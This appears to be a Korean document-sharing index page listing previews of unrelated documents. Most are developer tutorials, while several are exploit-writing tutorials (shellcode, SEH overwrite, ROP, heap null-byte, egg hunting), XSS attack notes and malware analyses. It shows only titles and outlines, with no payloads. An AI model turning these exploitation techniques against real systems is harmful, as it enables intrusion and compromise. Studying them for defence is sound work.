ActFax 4.31 Local Privilege Escalation Exploit NSHC 2013. 05. 23 악성코드 분석 보고서 [ Ransomware 악성코드 ] 사용자의 컴퓨터를 강제로 잠그고 돈을 요구하는 형태의 공격이 기승을 부리고 있 습니다. 이러한 형태의 공격에 이용되는 악성코드는 Ransomware로 불리는 악성코 드 입니다. 한번 감염 시 치료절차가 복잡하며, 보고서 작성 시점을 기준으로 지속 적인 피해자가 발생되고

More information

SQL Developer Connect to TimesTen 유니원아이앤씨 DB 기술지원팀 2010 년 07 월 28 일 문서정보 프로젝트명 SQL Developer Connect to TimesTen 서브시스템명 버전 1.0 문서명 작성일 작성자

SQL Developer Connect to TimesTen 유니원아이앤씨 DB 기술지원팀 2010 년 07 월 28 일 문서정보 프로젝트명 SQL Developer Connect to TimesTen 서브시스템명 버전 1.0 문서명 작성일 작성자 SQL Developer Connect to TimesTen 유니원아이앤씨 DB 팀 2010 년 07 월 28 일 문서정보 프로젝트명 SQL Developer Connect to TimesTen 서브시스템명 버전 1.0 문서명 작성일 2010-07-28 작성자 김학준 최종수정일 2010-07-28 문서번호 20100728_01_khj 재개정이력 일자내용수정인버전

More information

Poison null byte Excuse the ads! We need some help to keep our site up. List 1 Conditions 2 Exploit plan 2.1 chunksize(p)!= prev_size (next_chunk(p) 3

Poison null byte Excuse the ads! We need some help to keep our site up. List 1 Conditions 2 Exploit plan 2.1 chunksize(p)!= prev_size (next_chunk(p) 3 Poison null byte Excuse the ads! We need some help to keep our site up. List 1 Conditions 2 Exploit plan 2.1 chunksize(p)!= prev_size (next_chunk(p) 3 Example 3.1 Files 3.2 Source code 3.3 Exploit flow

More information

Analytics > Log & Crash Search > Unity ios SDK [Deprecated] Log & Crash Unity ios SDK. TOAST SDK. Log & Crash Unity SDK Log & Crash Search. Log & Cras

Analytics > Log & Crash Search > Unity ios SDK [Deprecated] Log & Crash Unity ios SDK. TOAST SDK. Log & Crash Unity SDK Log & Crash Search. Log & Cras Analytics > Log & Crash Search > Unity ios SDK [Deprecated] Log & Crash Unity ios SDK. TOAST SDK. Log & Crash Unity SDK Log & Crash Search. Log & Crash Unity SDK... Log & Crash Search. - Unity3D v4.0 ios

More information

IDA 5.x Manual 07.02.hwp

IDA 5.x Manual 07.02.hwp IDA 5.x Manual - Manual 01 - 영리를 목적으로 한 곳에서 배포금지 Last Update 2007. 02 이강석 / certlab@gmail.com 어셈블리어 개발자 그룹 :: 어셈러브 http://www.asmlove.co.kr - 1 - IDA Pro 는 Disassembler 프로그램입니다. 기계어로 되어있는 실행파일을 어셈블리언어

More information

Microsoft PowerPoint Android-SDK설치.HelloAndroid(1.0h).pptx

Microsoft PowerPoint Android-SDK설치.HelloAndroid(1.0h).pptx To be an Android Expert 문양세강원대학교 IT 대학컴퓨터학부 Eclipse (IDE) JDK Android SDK with ADT IDE: Integrated Development Environment JDK: Java Development Kit (Java SDK) ADT: Android Development Tools 2 JDK 설치 Eclipse

More information

Microsoft PowerPoint - 11주차_Android_GoogleMap.ppt [호환 모드]

Microsoft PowerPoint - 11주차_Android_GoogleMap.ppt [호환 모드] Google Map View 구현 학습목표 교육목표 Google Map View 구현 Google Map 지원 Emulator 생성 Google Map API Key 위도 / 경도구하기 위도 / 경도에따른 Google Map View 구현 Zoom Controller 구현 Google Map View (1) () Google g Map View 기능 Google

More information

Basic of Real World Exploit on Windows Author

Basic of Real World Exploit on Windows Author Basic of Real World Exploit on Windows Author sweetchip@wiseguys 목차 0x00 Intro 0x10 Target 0x20 Vulnerability ㄴ 0x21 What is Buffer Overflow? ㄴ 0x22 How does buffer overflow occurs? 0x30 Debugging ㄴ 0x31

More information

Microsoft PowerPoint - chap01-C언어개요.pptx

Microsoft PowerPoint - chap01-C언어개요.pptx #include int main(void) { int num; printf( Please enter an integer: "); scanf("%d", &num); if ( num < 0 ) printf("is negative.\n"); printf("num = %d\n", num); return 0; } 1 학습목표 프로그래밍의 기본 개념을

More information

Studuino소프트웨어 설치

Studuino소프트웨어 설치 Studuino 프로그래밍환경 Studuino 소프트웨어설치 본자료는 Studuino 프로그래밍환경설치안내서입니다. Studuino 프로그래밍 환경의갱신에따라추가 / 수정될수있습니다. 목차 1. 소개... 1 2. Windows... 2 2.1. 프로그래밍환경설치... 2 2.1.1. 웹설치버전설치방법... 2 2.2. Studuino 프로그래밍환경실행...

More information

Microsoft PowerPoint SDK설치.HelloAndroid(1.5h).pptx

Microsoft PowerPoint SDK설치.HelloAndroid(1.5h).pptx To be an Android Expert 문양세강원대학교 IT 대학컴퓨터학부 개발환경구조및설치순서 JDK 설치 Eclipse 설치 안드로이드 SDK 설치 ADT(Androd Development Tools) 설치 AVD(Android Virtual Device) 생성 Hello Android! 2 Eclipse (IDE) JDK Android SDK with

More information

Microsoft Word - SEH_Overwrites_Simplified.doc

Microsoft Word - SEH_Overwrites_Simplified.doc SEH Overwrites Simplified v1.01 1 Date : 2007. 10. 29 저자 : Aelphaeis Mangarae 편역 : Kancho ( kancholove@gmail.com, www.securityproof.net ) 머리말 이문서는 Stack 다이어그램을이용하여두개의다른 Windows 플랫폼에서의 SEH Overwrite를다룹니다.

More information

Microsoft Word - building the win32 shellcode 01.doc

Microsoft Word - building the win32 shellcode 01.doc Win32 Attack 1. Local Shellcode 작성방법 By 달고나 (Dalgona@wowhacker.org) Email: zinwon@gmail.com Abstract 이글은 MS Windows 환경에서 shellcode 를작성하는방법에대해서설명하고있다. Win32 는 *nix 환경과는사뭇다른 API 호출방식을사용하기때문에조금복잡하게둘러서 shellcode

More information

DocsPin_Korean.pages

DocsPin_Korean.pages Unity Localize Script Service, Page 1 Unity Localize Script Service Introduction Application Game. Unity. Google Drive Unity.. Application Game. -? ( ) -? -?.. 준비사항 Google Drive. Google Drive.,.. - Google

More information

CD-RW_Advanced.PDF

CD-RW_Advanced.PDF HP CD-Writer Program User Guide - - Ver. 2.0 HP CD-RW Adaptec Easy CD Creator Copier, Direct CD. HP CD-RW,. Easy CD Creator 3.5C, Direct CD 3.0., HP. HP CD-RW TEAM ( 02-3270-0803 ) < > 1. CD...3 CD...5

More information

XSS Attack - Real-World XSS Attacks, Chaining XSS and Other Attacks, Payloads for XSS Attacks

XSS Attack - Real-World XSS Attacks, Chaining XSS and Other Attacks, Payloads for XSS Attacks XSS s XSS, s, May 25, 2010 XSS s 1 2 s 3 XSS s MySpace 사건. Samy (JS.Spacehero) 프로필 페이지에 자바스크립트 삽입. 스크립트 동작방식 방문자를 친구로 추가. 방문자의 프로필에 자바스크립트를 복사. 1시간 만에 백만 명이 친구등록. s XSS s 위험도가 낮은 xss 취약점을 다른 취약점과 연계하여

More information

Evernote Export

Evernote Export Exploit writing tutorial part 1 : Stack Based Overflows ** 번역목적 - 이 Article 은 corelan.be 에있는버퍼오버플로우에관한문서이다. 총 11 개의 Article 로구성되어있으며, 과연언제까지번역작업을할지모르겠다. -_-; 오역은원문을보시면서알아서해석하시기바란다. 영어공부및 BOF 개념이해목적으로번역

More information

API 매뉴얼

API 매뉴얼 PCI-DIO12 API Programming (Rev 1.0) Windows, Windows2000, Windows NT and Windows XP are trademarks of Microsoft. We acknowledge that the trademarks or service names of all other organizations mentioned

More information

*2008년1월호진짜

*2008년1월호진짜 3. USB 이동식저장장치를이용하여전파되는악성코드분석 1. 개 요 최근 USB 이동식 저장장치를 통하여 전파되는 악성코드에 대한 감염피해가 증가하고 있어 주의가 필요하다. 이번에 확인된 ntion.exe 악성코드는 감염 시, 특정 사이트에 접속하여 추가 악성코드를 다운로드하는 Dropper 기능을 수행한다. 또한, 웹 서버가 감염될 경우는 웹 서버내의 웹 페이지가

More information

Microsoft PowerPoint - System Programming Lab Week1.ppt [호환 모드]

Microsoft PowerPoint - System Programming Lab Week1.ppt [호환 모드] System Programming Lab Week 1: Basic Skills for Practice Contents vi Editor 사용법 GCC 컴파일러사용법 Makefile 사용법 GDB 사용법 VI Editor Usage vi 모드 입력모드 : 실제문서를편집하는모드. 명령모드 : 키입력이바로명령이되는모드로서쓴내용을삭제하거나, 복사할때사용. ex 명령모드

More information

Install stm32cubemx and st-link utility

Install stm32cubemx and st-link utility STM32CubeMX and ST-LINK Utility for STM32 Development 본문서는 ST Microelectronics 의 ARM Cortex-M 시리즈 Microcontroller 개발을위해제공되는 STM32CubeMX 와 STM32 ST-LINK Utility 프로그램의설치과정을설명합니다. 본문서는 Microsoft Windows 7

More information

01.ROP(Return Oriented Programming)-x86 Excuse the ads! We need some help to keep our site up. List Return Oriented Programming(ROP) -x86 Gadgets - PO

01.ROP(Return Oriented Programming)-x86 Excuse the ads! We need some help to keep our site up. List Return Oriented Programming(ROP) -x86 Gadgets - PO 01.ROP(Return Oriented Programming)-x86 Excuse the ads! We need some help to keep our site up. List Return Oriented Programming(ROP) -x86 Gadgets - POP; POP; POP; RET PLT & GOT Debug Proof of concept Example

More information

Table Of Contents 1/7 0. Introduction 0-1. Introduction 0-1. Testing Environment 1. Software Vulnerabilty Review 1-1. Buffer OverFlow 1-2. Format Stri

Table Of Contents 1/7 0. Introduction 0-1. Introduction 0-1. Testing Environment 1. Software Vulnerabilty Review 1-1. Buffer OverFlow 1-2. Format Stri Windows System Hacking Technique Author E-Mail Blog Community Company : 조현석 (evernick) : 김언체 (ruina) : evernick@naver.com : ruina_s@naver.com : http://ruinick.tistory.com : http://cafe.naver.com/rekcah

More information

ISP and CodeVisionAVR C Compiler.hwp

ISP and CodeVisionAVR C Compiler.hwp USBISP V3.0 & P-AVRISP V1.0 with CodeVisionAVR C Compiler http://www.avrmall.com/ November 12, 2007 Copyright (c) 2003-2008 All Rights Reserved. USBISP V3.0 & P-AVRISP V1.0 with CodeVisionAVR C Compiler

More information

API STORE 키발급및 API 사용가이드 Document Information 문서명 : API STORE 언어별 Client 사용가이드작성자 : 작성일 : 업무영역 : 버전 : 1 st Draft. 서브시스템 : 문서번호 : 단계 : Docum

API STORE 키발급및 API 사용가이드 Document Information 문서명 : API STORE 언어별 Client 사용가이드작성자 : 작성일 : 업무영역 : 버전 : 1 st Draft. 서브시스템 : 문서번호 : 단계 : Docum API STORE 키발급및 API 사용가이드 Document Information 문서명 : API STORE 언어별 Client 사용가이드작성자 : 작성일 : 2012.11.23 업무영역 : 버전 : 1 st Draft. 서브시스템 : 문서번호 : 단계 : Document Distribution Copy Number Name(Role, Title) Date

More information

Microsoft Word - src.doc

Microsoft Word - src.doc IPTV 서비스탐색및콘텐츠가이드 RI 시스템운용매뉴얼 목차 1. 서버설정방법... 5 1.1. 서비스탐색서버설정... 5 1.2. 컨텐츠가이드서버설정... 6 2. 서버운용방법... 7 2.1. 서비스탐색서버운용... 7 2.1.1. 서비스가이드서버실행... 7 2.1.2. 서비스가이드정보확인... 8 2.1.3. 서비스가이드정보추가... 9 2.1.4. 서비스가이드정보삭제...

More information

SIGIL 완벽입문

SIGIL 완벽입문 누구나 만드는 전자책 SIGIL 을 이용해 전자책을 만들기 EPUB 전자책이 가지는 단점 EPUB이라는 포맷과 제일 많이 비교되는 포맷은 PDF라는 포맷 입니다. EPUB이 나오기 전까지 전 세계에서 가장 많이 사용되던 전자책 포맷이고, 아직도 많이 사 용되기 때문이기도 한며, 또한 PDF는 종이책 출력을 위해서도 사용되기 때문에 종이책 VS

More information

Mango-IMX6Q mfgtool을 이용한 이미지 Write하기

Mango-IMX6Q mfgtool을 이용한 이미지 Write하기 Mango-IMX6Q mfgtool 을 이용한이미지 Write 하기 http://www.mangoboard.com/ http://cafe.naver.com/embeddedcrazyboys Crazy Embedded Laboratory www.mangoboard.com cafe.naver.com/embeddedcrazyboys CRZ Technology 1 Document

More information

BMP 파일 처리

BMP 파일 처리 BMP 파일처리 김성영교수 금오공과대학교 컴퓨터공학과 학습내용 영상반전프로그램제작 2 Inverting images out = 255 - in 3 /* 이프로그램은 8bit gray-scale 영상을입력으로사용하여반전한후동일포맷의영상으로저장한다. */ #include #include #define WIDTHBYTES(bytes)

More information

목차 윈도우드라이버 1. 매뉴얼안내 운영체제 (OS) 환경 윈도우드라이버준비 윈도우드라이버설치 Windows XP/Server 2003 에서설치 Serial 또는 Parallel 포트의경우.

목차 윈도우드라이버 1. 매뉴얼안내 운영체제 (OS) 환경 윈도우드라이버준비 윈도우드라이버설치 Windows XP/Server 2003 에서설치 Serial 또는 Parallel 포트의경우. 소프트웨어매뉴얼 윈도우드라이버 Rev. 3.03 SLP-TX220 / TX223 SLP-TX420 / TX423 SLP-TX400 / TX403 SLP-DX220 / DX223 SLP-DX420 / DX423 SLP-DL410 / DL413 SLP-T400 / T403 SLP-T400R / T403R SLP-D220 / D223 SLP-D420 / D423

More information

CVE Analysis

CVE Analysis ANALYSIS BASH SHELL SHELLSHOCK BUG KIM DONG HYUN WHATTEAM & LET S CQ & KOREA IT TECHNICAL SCHOOL rlaehdgus213@naver.com 페이지 0 / 10 Analysis Bash Shell Shellshock BUG hackpupu CVE BUG Analysis http://hackerpupu.tistory.com

More information

PowerPoint Template

PowerPoint Template 설치및실행방법 Jaewoo Shim Jun. 4. 2018 Contents SQL 인젝션이란 WebGoat 설치방법 실습 과제 2 SQL 인젝션이란 데이터베이스와연동된웹서버에입력값을전달시악의적동작을수행하는쿼리문을삽입하여공격을수행 SELECT * FROM users WHERE id= $_POST[ id ] AND pw= $_POST[ pw ] Internet

More information

Deok9_PE Structure

Deok9_PE Structure PE Structure CodeEngn Co-Administrator!!! and Team Sur3x5F Member Nick : Deok9 E-mail : DDeok9@gmail.com HomePage : http://deok9.sur3x5f.org Twitter :@DDeok9 1. PE > 1) PE? 2) PE 3) PE Utility

More information

Computer Security Chapter 08. Format String 김동진 1 Secure Software Lab.

Computer Security Chapter 08. Format String 김동진   1 Secure Software Lab. Computer Security Chapter 08. Format Strig 김동진 (kdjorag@gmail.com) http://securesw.dakook.ac.kr/ 1 목차 Format Strig Attack? Format Strig? Format Strig Attack 의원리 입력코드생성 Format Strig Attack (kerel v2.2,

More information

Secure Programming Lecture1 : Introduction

Secure Programming Lecture1 : Introduction Malware and Vulnerability Analysis Lecture1 Malware Analysis #1 Agenda 악성코드정적분석 악성코드분석 악성코드정적분석 정적분석 임의의코드또는응용프로그램을실행하지않고분석 ASCII 문자열 (ex. URL) API 리스트 Packing VT 기타등등 정적분석 : 파일식별 악성으로의심되는파일의형태식별 file

More information

server name>/arcgis/rest/services server name>/<web adaptor name>/rest/services ArcGIS 10.1 for Server System requirements - 지

server name>/arcgis/rest/services  server name>/<web adaptor name>/rest/services ArcGIS 10.1 for Server System requirements - 지 ArcGIS for Server (Windows) 설치가이드 ArcGIS 10.2 for Server 설치변경사항 1 설치 간편해진설치 -.Net Framework나 Java Runtime 요구하지않음 - 웹서버 (IIS, WebSphere ) 와별도로분리되어순수하게웹서비스기반의 GIS 서버역할 - ArcGIS Server 계정을이용한서비스운영. 더이상 SOM,

More information

02 C h a p t e r Java

02 C h a p t e r Java 02 C h a p t e r Java Bioinformatics in J a va,, 2 1,,,, C++, Python, (Java),,, (http://wwwbiojavaorg),, 13, 3D GUI,,, (Java programming language) (Sun Microsystems) 1995 1990 (green project) TV 22 CHAPTER

More information

The_IDA_Pro_Book

The_IDA_Pro_Book The IDA Pro Book Hacking Group OVERTIME force (forceteam01@gmail.com) GETTING STARTED WITH IDA IDA New : Go : IDA Previous : IDA File File -> Open Processor type : Loading Segment and Loading Offset x86

More information

Data Sync Manager(DSM) Example Guide Data Sync Manager (DSM) Example Guide DSM Copyright 2003 Ari System, Inc. All Rights reserved. Data Sync Manager

Data Sync Manager(DSM) Example Guide Data Sync Manager (DSM) Example Guide DSM Copyright 2003 Ari System, Inc. All Rights reserved. Data Sync Manager Data Sync Manager (DSM) Example Guide DSM Copyright 2003 Ari System, Inc. All Rights reserved. Data Sync Manager are trademarks or registered trademarks of Ari System, Inc. 1 Table of Contents Chapter1

More information

4S 1차년도 평가 발표자료

4S 1차년도 평가 발표자료 모바일 S/W 프로그래밍 안드로이드개발환경설치 2012.09.05. 오병우 모바일공학과 JDK (Java Development Kit) SE (Standard Edition) 설치순서 Eclipse ADT (Android Development Tool) Plug-in Android SDK (Software Development Kit) SDK Components

More information

Eureka Mail Client_v2.2.q를이용하여오믈렛에그헌팅에대하여알아볼것이다. 익스플로잇을위해구성된환경은아래와같다. - Windows XP Professional SP3 KOR - Python Ollydbg 1.x, Immunity Debugg

Eureka Mail Client_v2.2.q를이용하여오믈렛에그헌팅에대하여알아볼것이다. 익스플로잇을위해구성된환경은아래와같다. - Windows XP Professional SP3 KOR - Python Ollydbg 1.x, Immunity Debugg 익스플로잇실습 / 튜토리얼 Eureka Mail Client 2.2q Omelet Egg Hunting By WraithOfGhost Eureka Mail Client_v2.2.q를이용하여오믈렛에그헌팅에대하여알아볼것이다. 익스플로잇을위해구성된환경은아래와같다. - Windows XP Professional SP3 KOR - Python 2.7.10 - Ollydbg

More information

Microsoft Word - Armjtag_문서1.doc

Microsoft Word - Armjtag_문서1.doc ARM JTAG (wiggler 호환 ) 사용방법 ( IAR EWARM 에서 ARM-JTAG 로 Debugging 하기 ) Test Board : AT91SAM7S256 IAR EWARM : Kickstart for ARM ARM-JTAG : ver 1.0 ( 씨링크테크 ) 1. IAR EWARM (Kickstart for ARM) 설치 2. Macraigor

More information

목 차 1. 개요 취약점분석추진배경 CVE 취약점요약 CVE 분석 CVE 취약점개요 CVE 대상시스템목록...

목 차 1. 개요 취약점분석추진배경 CVE 취약점요약 CVE 분석 CVE 취약점개요 CVE 대상시스템목록... 취약점분석보고서 = CVE-2012-0754 = - 서준석연구원 - 2012-08-02 보안프로젝트와한국정보보호교육센터에서공동연구한것입니다. 상업적으로사용하여법적인문제가생기는경우는사용자자신에게책임이 있음을경고합니다. 목 차 1. 개요... 1 1.1. 취약점분석추진배경... 1 1.2. CVE-2012-0754 취약점요약... 1 2. CVE-2012-0754

More information

01_피부과Part-01

01_피부과Part-01 PART 1 CHAPTER 01 3 PART 4 C H A P T E R 5 PART CHAPTER 02 6 C H A P T E R CHAPTER 03 7 PART 8 C H A P T E R 9 PART 10 C H A P T E R 11 PART 12 C H A P T E R 13 PART 14 C H A P T E R TIP 15 PART TIP TIP

More information

슬라이드 1

슬라이드 1 Qt Creator 1. 도구개요 2. 설치및실행 3. 주요기능 4. 활용예제 1. 도구개요 도구명 소개 Qt Creator (http://qt-project.org/wiki/category:tools::qtcreator) 라이선스 LGPL v2.1 GUI 프로그램을쉽게만들수있는 Cross-platform 프레임워크인 Qt 를통해애플리케이션을개발할수있게해주는

More information

Microsoft PowerPoint - a10.ppt [호환 모드]

Microsoft PowerPoint - a10.ppt [호환 모드] Structure Chapter 10: Structures t and Macros Structure 관련된변수들의그룹으로이루어진자료구조 template, pattern field structure를구성하는변수 (cf) C언어의 struct 프로그램의 structure 접근 entire structure 또는 individual fields Structure는

More information

INTRO Basic architecture of modern computers Basic and most used assembly instructions on x86 Installing an assembly compiler and RE tools Practice co

INTRO Basic architecture of modern computers Basic and most used assembly instructions on x86 Installing an assembly compiler and RE tools Practice co Basic reverse engineering on x86 This is for those who want to learn about basic reverse engineering on x86 (Feel free to use this, email me if you need a keynote version.) v0.1 SeungJin Beist Lee beist@grayhash.com

More information

< 목차 > 1. 악성코드은닉동향요약 1 2. 홈페이지은닉형악성코드통계 2 - 유포지탐지 국가별현황 2 - 대량경유지가탐지된유포지 TOP 악성코드유형별비율 4 - 악성코드취약점유형별비율 4 - 악성코드수집및분석결과 5 - 경유지탐지 업종별비율 9 3. 악성코

< 목차 > 1. 악성코드은닉동향요약 1 2. 홈페이지은닉형악성코드통계 2 - 유포지탐지 국가별현황 2 - 대량경유지가탐지된유포지 TOP 악성코드유형별비율 4 - 악성코드취약점유형별비율 4 - 악성코드수집및분석결과 5 - 경유지탐지 업종별비율 9 3. 악성코 월간악성코드은닉사이트탐지 동향보고서 (2 월 ) 2013. 03. 침해사고대응단 인터넷침해대응센터 < 목차 > 1. 악성코드은닉동향요약 1 2. 홈페이지은닉형악성코드통계 2 - 유포지탐지 국가별현황 2 - 대량경유지가탐지된유포지 TOP10 3 - 악성코드유형별비율 4 - 악성코드취약점유형별비율 4 - 악성코드수집및분석결과 5 - 경유지탐지 업종별비율 9 3.

More information

익스플로잇실습 / 튜토리얼 Easy RM to MP3 Converter ROP [ Direct RET VirtualProtect() 함수사용 ] By WraithOfGhost

익스플로잇실습 / 튜토리얼 Easy RM to MP3 Converter ROP [ Direct RET VirtualProtect() 함수사용 ] By WraithOfGhost 익스플로잇실습 / 튜토리얼 Easy RM to MP3 Converter 2.7.3 ROP [ Direct RET VirtualProtect() 함수사용 ] By WraithOfGhost Easy RM to MP3 Converter_v2.7.3을이용하여 ROP 공격에대하여알아볼것이다. 익스플로잇을위해구성된환경은아래와같다. - Windows XP Professional

More information

vi 사용법

vi 사용법 유닉스프로그래밍및실습 gdb 사용법 fprintf 이용 단순디버깅 확인하고자하는코드부분에 fprintf(stderr, ) 를이용하여그지점까지도달했는지여부와관심있는변수의값을확인 여러유형의단순한문제를확인할수있음 그러나자세히살펴보기위해서는디버깅툴필요 int main(void) { int count; long large_no; double real_no; init_vars();

More information

<322EBCF8C8AF28BFACBDC0B9AEC1A6292E687770>

<322EBCF8C8AF28BFACBDC0B9AEC1A6292E687770> 연습문제해답 5 4 3 2 1 0 함수의반환값 =15 5 4 3 2 1 0 함수의반환값 =95 10 7 4 1-2 함수의반환값 =3 1 2 3 4 5 연습문제해답 1. C 언어에서의배열에대하여다음중맞는것은? (1) 3차원이상의배열은불가능하다. (2) 배열의이름은포인터와같은역할을한다. (3) 배열의인덱스는 1에서부터시작한다. (4) 선언한다음, 실행도중에배열의크기를변경하는것이가능하다.

More information

Adobe Flash 취약점 분석 (CVE-2012-0754)

Adobe Flash 취약점 분석 (CVE-2012-0754) 기술문서 14. 08. 13. 작성 GNU C library dynamic linker $ORIGIN expansion Vulnerability Author : E-Mail : 윤지환 131ackcon@gmail.com Abstract 2010 년 Tavis Ormandy 에 의해 발견된 취약점으로써 정확한 명칭은 GNU C library dynamic linker

More information

simple ROP Exploit

simple ROP Exploit SIMPLE ROP EXPLOIT 문제로풀어보는 ROP TigerTeam elttzero@tigerteam.kr 목차 1. 개요... 2 2. Buffer OverFlow... 2 3. BOF 방어기법... 3 3.1. DEP(Data Execution Prevention)... 3 3.2. ASLR(Address Space Layout Randomization)...

More information

PowerPoint 프레젠테이션

PowerPoint 프레젠테이션 Deep Learning 작업환경조성 & 사용법 ISL 안재원 Ubuntu 설치 작업환경조성 접속방법 사용예시 2 - ISO file Download www.ubuntu.com Ubuntu 설치 3 - Make Booting USB Ubuntu 설치 http://www.pendrivelinux.com/universal-usb-installer-easy-as-1-2-3/

More information

서현수

서현수 Introduction to TIZEN SDK UI Builder S-Core 서현수 2015.10.28 CONTENTS TIZEN APP 이란? TIZEN SDK UI Builder 소개 TIZEN APP 개발방법 UI Builder 기능 UI Builder 사용방법 실전, TIZEN APP 개발시작하기 마침 TIZEN APP? TIZEN APP 이란? Mobile,

More information

Microsoft Word - Static analysis of Shellcode.doc

Microsoft Word - Static analysis of Shellcode.doc Static analysis of Shellcode By By Maarten Van Horenbeeck 2008.09.03 2008.09.03 본문서에서는악성코드에서사용하는난독화되어있는쉘코드 를분석하는방법에대한 Maarten Van Horenbeeck 의글을번역 한것이다. Hacking Group OVERTIME OVERTIME force

More information

<4D F736F F F696E74202D204B FC7C1B7CEB1D7B7A55F F6E48616E646C6572B8A6C5EBC7D1BFA1B7AFB0CBC3E2B9D7BCF6C1A

<4D F736F F F696E74202D204B FC7C1B7CEB1D7B7A55F F6E48616E646C6572B8A6C5EBC7D1BFA1B7AFB0CBC3E2B9D7BCF6C1A 강연소개 Exception Handler 를통한에러검출및수정 디버깅을즐겨하십니까..? 에러를만나면반갑습니까..? 전화로버그보고를받았나요..? 잡히지않는버그!!!! 따분한강의 졸아도좋습니다!!!! 강연자소개 테스터 온라인게임클라이언트개발 로컬라이즈및해외지원업무 디버깅, 최적화, 호환성향상에관심 강연대상 x86 환경에서 Windows 프로그래밍 디버깅 / 에러추적은

More information

Windows 8에서 BioStar 1 설치하기

Windows 8에서 BioStar 1 설치하기 / 콘텐츠 테이블... PC에 BioStar 1 설치 방법... Microsoft SQL Server 2012 Express 설치하기... Running SQL 2012 Express Studio... DBSetup.exe 설정하기... BioStar 서버와 클라이언트 시작하기... 1 1 2 2 6 7 1/11 BioStar 1, Windows 8 BioStar

More information

Microsoft Word - FS_ZigBee_Manual_V1.3.docx

Microsoft Word - FS_ZigBee_Manual_V1.3.docx FirmSYS Zigbee etworks Kit User Manual FS-ZK500 Rev. 2008/05 Page 1 of 26 Version 1.3 목 차 1. 제품구성... 3 2. 개요... 4 3. 네트워크 설명... 5 4. 호스트/노드 설명... 6 네트워크 구성... 6 5. 모바일 태그 설명... 8 6. 프로토콜 설명... 9 프로토콜 목록...

More information

<4D F736F F F696E74202D C61645FB3EDB8AEC7D5BCBA20B9D720C5F8BBE7BFEBB9FD2E BC8A3C8AF20B8F0B5E55D>

<4D F736F F F696E74202D C61645FB3EDB8AEC7D5BCBA20B9D720C5F8BBE7BFEBB9FD2E BC8A3C8AF20B8F0B5E55D> VHDL 프로그래밍 D. 논리합성및 Xilinx ISE 툴사용법 학습목표 Xilinx ISE Tool 을이용하여 Xilinx 사에서지원하는해당 FPGA Board 에맞는논리합성과정을숙지 논리합성이가능한코드와그렇지않은코드를구분 Xilinx Block Memory Generator를이용한 RAM/ ROM 생성하는과정을숙지 2/31 Content Xilinx ISE

More information

Smart Power Scope Release Informations.pages

Smart Power Scope Release Informations.pages v2.3.7 (2017.09.07) 1. Galaxy S8 2. SS100, SS200 v2.7.6 (2017.09.07) 1. SS100, SS200 v1.0.7 (2017.09.07) [SHM-SS200 Firmware] 1. UART Command v1.3.9 (2017.09.07) [SHM-SS100 Firmware] 1. UART Command SH모바일

More information

< FBFF9B0A320BEC7BCBAC4DAB5E520C0BAB4D0BBE7C0CCC6AE20C5BDC1F620B5BFC7E220BAB8B0EDBCAD283131BFF E302028C8A8C6E4C0CCC1F620BEF7B

< FBFF9B0A320BEC7BCBAC4DAB5E520C0BAB4D0BBE7C0CCC6AE20C5BDC1F620B5BFC7E220BAB8B0EDBCAD283131BFF E302028C8A8C6E4C0CCC1F620BEF7B 월간악성코드은닉사이트탐지 동향보고서 (11 월 ) 2012. 12. 침해사고대응단 인터넷침해대응센터 < 목차 > 1. 악성코드은닉동향요약 1 2. 홈페이지은닉형악성코드통계 2 - 유포지탐지 국가별현황 2 - 대량경유지가탐지된유포지 TOP10 3 - 악성코드유형별비율 4 - 악성코드취약점유형별비율 4 - 악성코드수집및분석결과 5 - 경유지탐지 업종별비율 10

More information

Endpoint Protector - Active Directory Deployment Guide

Endpoint Protector - Active Directory Deployment Guide Version 1.0.0.1 Active Directory 배포가이드 I Endpoint Protector Active Directory Deployment Guide 목차 1. 소개...1 2. WMI 필터생성... 2 3. EPP 배포 GPO 생성... 9 4. 각각의 GPO 에해당하는 WMI 연결... 12 5.OU 에 GPO 연결... 14 6. 중요공지사항

More information

IPAK 윤리강령 나는 _ 한국IT전문가협회 회원으로서 긍지와 보람을 느끼며 정보시스템 활용하 자. 나는 _동료, 단체 및 국가 나아가 인류사회에 대하여 철저한 책임 의식을 가진 다. 나는 _ 활용자에 대하여 그 편익을 증진시키는데 최선을 다한다. 나는 _ 동료에 대해

IPAK 윤리강령 나는 _ 한국IT전문가협회 회원으로서 긍지와 보람을 느끼며 정보시스템 활용하 자. 나는 _동료, 단체 및 국가 나아가 인류사회에 대하여 철저한 책임 의식을 가진 다. 나는 _ 활용자에 대하여 그 편익을 증진시키는데 최선을 다한다. 나는 _ 동료에 대해 IPAK 윤리강령 나는 _ 한국IT전문가협회 회원으로서 긍지와 보람을 느끼며 정보시스템 활용하 자. 나는 _동료, 단체 및 국가 나아가 인류사회에 대하여 철저한 책임 의식을 가진 다. 나는 _ 활용자에 대하여 그 편익을 증진시키는데 최선을 다한다. 나는 _ 동료에 대해서 도의와 성실과 지식을 바탕으로 서로 우애하고 경애한다. 나는 _ 단체와 국가에 대해서 그

More information

2) 활동하기 활동개요 활동과정 [ 예제 10-1]main.xml 1 <LinearLayout xmlns:android="http://schemas.android.com/apk/res/android" 2 xmlns:tools="http://schemas.android.

2) 활동하기 활동개요 활동과정 [ 예제 10-1]main.xml 1 <LinearLayout xmlns:android=http://schemas.android.com/apk/res/android 2 xmlns:tools=http://schemas.android. 10 차시파일처리 1 학습목표 내장메모리의파일을처리하는방법을배운다. SD 카드의파일을처리하는방법을배운다. 2 확인해볼까? 3 내장메모리파일처리 1) 학습하기 [ 그림 10-1] 내장메모리를사용한파일처리 2) 활동하기 활동개요 활동과정 [ 예제 10-1]main.xml 1

More information

기초에서 활용까지 윈도우즈 임베디드 CE 프로그래밍

기초에서 활용까지 윈도우즈 임베디드 CE 프로그래밍 . Microsoft,, MVP Regional Director Shu-Fen Cally. Microsoft MVP. IT,. Microsoft.NET INETA, 70 50%,. Windows Mobile..,. Windows CE 10,.., Mobile Device,. 18 Windows Embedded CE Progra mming Microsoft Mobile

More information

이도경, 최덕재 Dokyeong Lee, Deokjai Choi 1. 서론

이도경, 최덕재 Dokyeong Lee, Deokjai Choi 1. 서론 이도경, 최덕재 Dokyeong Lee, Deokjai Choi 1. 서론 2. 관련연구 2.1 MQTT 프로토콜 Fig. 1. Topic-based Publish/Subscribe Communication Model. Table 1. Delivery and Guarantee by MQTT QoS Level 2.1 MQTT-SN 프로토콜 Fig. 2. MQTT-SN

More information

A Hierarchical Approach to Interactive Motion Editing for Human-like Figures

